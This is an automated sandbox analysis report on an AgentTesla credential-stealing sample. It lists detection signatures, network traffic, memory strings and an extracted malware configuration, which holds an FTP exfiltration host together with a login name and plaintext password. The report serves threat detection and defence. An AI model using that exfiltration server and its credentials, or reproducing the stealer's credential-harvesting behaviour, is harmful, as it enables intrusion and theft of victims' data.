Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Q4YODvoYjL.exe

Overview

General Information

Sample Name:Q4YODvoYjL.exe
Original Sample Name:e30c67b19383f259d7414b763049eb2f.exe
Analysis ID:830848
MD5:e30c67b19383f259d7414b763049eb2f
SHA1:8a1465b73066cf8642d39c9ef2333d8361e9d177
SHA256:182086eeecf6f1b4dc82a040a476d947759556513ad63c129604c565cd06cdc3
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Q4YODvoYjL.exe (PID: 576 cmdline: C:\Users\user\Desktop\Q4YODvoYjL.exe MD5: E30C67B19383F259D7414B763049EB2F)
    • Q4YODvoYjL.exe (PID: 352 cmdline: C:\Users\user\Desktop\Q4YODvoYjL.exe MD5: E30C67B19383F259D7414B763049EB2F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.valvulasthermovalve.cl", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Q4YODvoYjL.exe PID: 352JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: Q4YODvoYjL.exe PID: 352JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5190.107.177.23949700549262851779 03/20/23-18:32:35.384138
          SID:2851779
          Source Port:49700
          Destination Port:54926
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5190.107.177.23949699212029927 03/20/23-18:32:35.159386
          SID:2029927
          Source Port:49699
          Destination Port:21
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Q4YODvoYjL.exeReversingLabs: Detection: 30%
          Source: Q4YODvoYjL.exeVirustotal: Detection: 38%Perma Link
          Antivirus detection for URL or domain
          Source: http://ftp.valvulasthermovalve.clURL Reputation: Label: phishing
          Multi AV Scanner detection for domain / URL
          Source: ftp.valvulasthermovalve.clVirustotal: Detection: 13%Perma Link
          Machine Learning detection for sample
          Source: Q4YODvoYjL.exeJoe Sandbox ML: detected
          Source: 0.2.Q4YODvoYjL.exe.3fd4f10.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.valvulasthermovalve.cl", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
          Source: Q4YODvoYjL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: Q4YODvoYjL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: kmTG.pdb source: Q4YODvoYjL.exe
          Source: Binary string: kmTG.pdbSHA256vL source: Q4YODvoYjL.exe

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49699 -> 190.107.177.239:21
          Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49700 -> 190.107.177.239:54926
          May check the online IP address of the machine
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeDNS query: name: api.ipify.org
          Source: Joe Sandbox ViewASN Name: SOCCOMERCIALWIRENETCHILELTDACL SOCCOMERCIALWIRENETCHILELTDACL
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewIP Address: 190.107.177.239 190.107.177.239
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficTCP traffic: 192.168.2.5:49700 -> 190.107.177.239:54926
          Source: unknownFTP traffic detected: 190.107.177.239:21 -> 192.168.2.5:49699 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 14:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: Q4YODvoYjL.exe, 00000001.00000002.562716771.0000000000C96000.00000004.00000020.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.valvulasthermovalve.cl
          Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
          Source: unknownDNS traffic detected: queries for: api.ipify.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: Q4YODvoYjL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 0_2_011EC844
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 0_2_011EF1F8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 0_2_011EF1E8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7A8F8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7C8B8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D79CE0
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7A028
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D759E3
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D77F0B
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538C78C
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538F5B1
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538C780
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538AA70
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0538D850
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_06606258
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_06605288
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_06600040
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_0660B8A8
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_06601968
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_06608840
          Source: Q4YODvoYjL.exe, 00000000.00000002.355813847.00000000071C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000000.297927431.00000000008D8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekmTG.exe> vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.356622503.0000000007480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002C87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002C87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002D17000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.346823897.0000000003C49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000000.00000002.346823897.0000000003FA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000001.00000002.562654629.00000000007E8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exe, 00000001.00000002.562504272.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exeBinary or memory string: OriginalFilenamekmTG.exe> vs Q4YODvoYjL.exe
          Source: Q4YODvoYjL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Q4YODvoYjL.exeReversingLabs: Detection: 30%
          Source: Q4YODvoYjL.exeVirustotal: Detection: 38%
          Source: Q4YODvoYjL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Q4YODvoYjL.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
          Source: Q4YODvoYjL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: Q4YODvoYjL.exeBinary or memory string: g.slN
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Q4YODvoYjL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Q4YODvoYjL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Q4YODvoYjL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: kmTG.pdb source: Q4YODvoYjL.exe
          Source: Binary string: kmTG.pdbSHA256vL source: Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 0_2_011ECB36 pushfd ; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.867913508227014
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
